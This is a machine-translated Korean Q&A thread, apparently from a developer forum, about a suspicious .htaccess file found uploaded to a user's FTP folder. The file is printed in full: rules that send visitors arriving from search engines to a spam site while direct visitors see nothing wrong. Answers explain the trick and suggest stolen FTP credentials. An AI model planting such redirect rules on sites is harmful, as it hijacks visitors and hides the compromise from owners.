의심스러운 .htaccess 파일

이것은 내 FTP 폴더 중 하나에 업로드되었습니다. 나는 아파치에 익숙하지 않지만 여전히 궁금하다. 누군가이 파일이 커밋하려고하는 어떤 종류의 별다른 행동을 말해 줄 수 있는가? 감사!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

검색 엔진에서 온 사용자를 마지막 사이트로 보냅니다 SPAMMER.info( 실제 사이트의 질문 내역 참조 ).

그것은에서 숨길 시도에서 추천을 찾습니다 당신 은 가능성이 검색 엔진을 통해 사이트에 액세스하지 않기 때문에. 즉, URL로 직접 이동하면 모든 것이 정상으로 보입니다. 그러나 검색 엔진을 통해 들어 오면 리디렉션됩니다.

참고 : 웹 크롤러 는 적어도 구글 봇 이 리퍼러 헤더를 설정 하지 않기 때문에 영향을 미치지 않습니다.

검색 엔진 사용자가 사이트의 모든 페이지를 방문 할 때마다 .info 스팸 사이트로 리디렉션됩니다.

매우 열악합니다. 일반적으로 주소를 입력하기 만하면 아무 문제가 없습니다.

더 추가하려면-아마도 ftp 자격 증명이 유출되었을 것입니다. 아마도 당신은 filezilla / total commander 등에 저장했을 것입니다. ftp 계정에 로그온하거나, 악성 자바 스크립트를 index.php / html에 첨부하거나 비슷한 재 작성 파일을 넣는 악성 코드가 많이 있습니다.